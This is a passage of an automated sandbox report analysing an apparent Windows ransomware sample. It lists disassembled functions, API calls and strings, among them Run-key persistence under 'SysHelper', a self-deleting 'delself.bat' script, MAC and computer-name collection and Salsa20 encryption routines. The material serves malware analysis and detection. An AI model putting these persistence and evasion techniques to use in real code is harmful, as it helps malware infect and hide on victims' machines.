                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                  • _memset.LIBCMT ref: 0040EBB4
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                  • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1637485200-213608013
                                                                                                  • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                  • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                    • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                    • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                    • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                    • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                    • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                    • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                    • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                  • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                  • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                  • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                  • DeleteDC.GDI32(?), ref: 00482450
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                  • API String ID: 151064509-1805842116
                                                                                                  • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                  • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                  • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                  • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0040E67F
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _malloc.LIBCMT ref: 0040E68B
                                                                                                  • _wprintf.LIBCMT ref: 0040E69E
                                                                                                  • _free.LIBCMT ref: 0040E6A4
                                                                                                    • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                  • _free.LIBCMT ref: 0040E6C5
                                                                                                  • _malloc.LIBCMT ref: 0040E6CD
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                  • _sprintf.LIBCMT ref: 0040E720
                                                                                                  • _wprintf.LIBCMT ref: 0040E732
                                                                                                  • _wprintf.LIBCMT ref: 0040E73C
                                                                                                  • _free.LIBCMT ref: 0040E745
                                                                                                  Strings
                                                                                                  • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                  • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                  • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                  • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                  • API String ID: 3901070236-1604013687
                                                                                                  • Opcode ID: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
                                                                                                  • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                  • Opcode Fuzzy Hash: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
                                                                                                  • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                    • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                    • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                                  • _memmove.LIBCMT ref: 00410427
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                                  • _memmove.LIBCMT ref: 00410514
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 273148273-0
                                                                                                  • Opcode ID: 2c535a9ce1b4a658066c3b574bdbe8b0733bbf1e4505cf72e2a34136cfdfc2a6
                                                                                                  • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                                                                                  • Opcode Fuzzy Hash: 2c535a9ce1b4a658066c3b574bdbe8b0733bbf1e4505cf72e2a34136cfdfc2a6
                                                                                                  • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3232302685-0
                                                                                                  • Opcode ID: 343a40c2320f36c0a67bd0d09e6816cdff555a949c20798249c71fe74911a55b
                                                                                                  • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                  • Opcode Fuzzy Hash: 343a40c2320f36c0a67bd0d09e6816cdff555a949c20798249c71fe74911a55b
                                                                                                  • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004382A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                  • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                  • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                  • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                  • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wassert
                                                                                                  • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                  • API String ID: 3993402318-1975116136
                                                                                                  • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                  • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                  • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                  • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$ContextDestroyHashRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3989222877-0
                                                                                                  • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                  • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                                                                                                  • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                  • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$ContextDestroyHashRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3989222877-0
                                                                                                  • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                  • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                                                                                                  • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                  • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$ContextDestroyHashRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3989222877-0
                                                                                                  • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                  • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                                                                                                  • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                  • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                  • GetLastError.KERNEL32 ref: 00412509
                                                                                                  • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                  • CloseHandle.KERNEL32 ref: 00412539
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                  • GetLastError.KERNEL32 ref: 0041255B
                                                                                                  • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                  • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                  • API String ID: 2372642624-488272950
                                                                                                  • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                  • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                  • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                  • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                  • API String ID: 909875538-2733969777
                                                                                                  • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                  • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                  • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                  • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503006713-0
                                                                                                  • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                  • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                  • _malloc.LIBCMT ref: 0041BBE4
                                                                                                  • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                  • _free.LIBCMT ref: 0041BCD7
                                                                                                    • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                    • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                    • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                    • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                    • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                    • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                  • IsWindow.USER32(?), ref: 0041BF69
                                                                                                  • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                  • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3873257347-0
                                                                                                  • Opcode ID: f729ec156da57fca7fee0a65632cfd00bd7f39968df2b9978418747e4f1c509a
                                                                                                  • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                  • Opcode Fuzzy Hash: f729ec156da57fca7fee0a65632cfd00bd7f39968df2b9978418747e4f1c509a
                                                                                                  • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00427B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DecodePointer.KERNEL32 ref: 00427B29
                                                                                                  • _free.LIBCMT ref: 00427B42
                                                                                                    • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
